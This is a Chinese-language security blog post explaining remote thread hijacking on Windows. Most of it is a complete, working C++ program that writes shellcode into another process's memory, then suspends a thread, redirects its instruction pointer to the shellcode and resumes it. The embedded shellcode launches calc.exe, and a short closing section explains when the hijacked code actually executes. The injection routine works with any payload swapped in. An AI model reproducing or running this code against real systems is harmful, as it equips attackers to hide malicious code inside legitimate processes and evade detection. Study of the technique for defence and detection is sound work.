0xd00's blog

Back

远程线程劫持的 C++ 实现Blur image

远程线程劫持的流程#

流程图

  1. 打开远程进程和线程
  2. 挂起目标线程
  3. 分配内存并写入 Shellcode
  4. 获取该线程的上下文
  5. 修改上下文中的指令指针(RIP/EIP)指向Shellcode地址
  6. 设置线程上下文
  7. 恢复线程执行

C++实现#

#include <windows.h>
#include <tlhelp32.h>
#include <iostream>

unsigned char buf[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

DWORD GetTargetThreadId(DWORD pid) {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    THREADENTRY32 te32;
    te32.dwSize = sizeof(THREADENTRY32);

    if (Thread32First(hSnap, &te32)) {
        do {
            if (te32.th32OwnerProcessID == pid) {
                CloseHandle(hSnap);
                return te32.th32ThreadID;
            }
        } while (Thread32Next(hSnap, &te32));
    }
    CloseHandle(hSnap);
    return 0;
}

int main() {
    DWORD targetPID = 37904; // 目标进程PID
    DWORD targetTID = GetTargetThreadId(targetPID);

    if (!targetTID) {
        std::cout << "[-] 未找到目标线程\n";
        return -1;
    }

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, targetTID);

    if (!hProcess || !hThread) {
        std::cout << "[-] 无法打开进程或线程\n";
        return -1;
    }

    // 分配内存
    LPVOID pRemoteShellcode = VirtualAllocEx(hProcess, NULL, sizeof(buf),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    // 写入Shellcode
    WriteProcessMemory(hProcess, pRemoteShellcode, buf, sizeof(buf), NULL);

    // 挂起线程
    SuspendThread(hThread);

    // 修改上下文
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_CONTROL;
    GetThreadContext(hThread, &ctx);
    ctx.Rip = (DWORD64)pRemoteShellcode;
    SetThreadContext(hThread, &ctx);

    // 恢复执行
    ResumeThread(hThread);

    std::cout << "[+] 线程劫持成功,Shellcode 已执行\n";

    CloseHandle(hThread);
    CloseHandle(hProcess);
    return 0;
}
c

image-20250731114718631

关于执行时机#

一个常见的新手误区是:认为调用 ResumeThread 后,Shellcode 会立即执行。但实际情况并非如此。代码在执行结束后过一段时间才会执行shellcode。

因为当调用 SetThreadContext(hThread, &ctx) 并将 Rip 设置为远程 Shellcode 地址后,并没有让线程立即运行这段代码,而是在当这个线程被操作系统调度器重新投入运行时,目标线程才会从我们设置的 Rip 地址开始执行

这就意味着:目标线程当前可能处于“挂起”、“等待消息”、“空闲”或“阻塞”状态,即使我们调用了 ResumeThread,也不能保证它立刻被调度执行。

远程线程劫持的 C++ 实现
https://blog.0xd00.com/blog/remote-thread-hijacking
Author 0xd00
Published at 2025年7月29日
Comment seems to stuck. Try to refresh?✨